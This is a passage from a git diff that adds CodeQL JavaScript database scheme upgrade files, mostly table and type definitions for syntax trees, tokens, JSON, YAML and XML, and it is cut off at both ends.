@regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape +| 28 = @regexp_quoted_string +| 29 = @regexp_intersection +| 30 = @regexp_subtraction; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_identifier_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +| 15 = @jsdoc_qualified_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/upgrade.properties b/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/upgrade.properties new file mode 100644 index 000000000000..c26b1e1de099 --- /dev/null +++ b/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/upgrade.properties @@ -0,0 +1,2 @@ +description: split up qualified names in jsdoc type exprs +compatibility: partial diff --git a/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/old.dbscheme b/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/old.dbscheme new file mode 100644 index 000000000000..c88c69174bd0 --- /dev/null +++ b/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/old.dbscheme @@ -0,0 +1,1190 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // 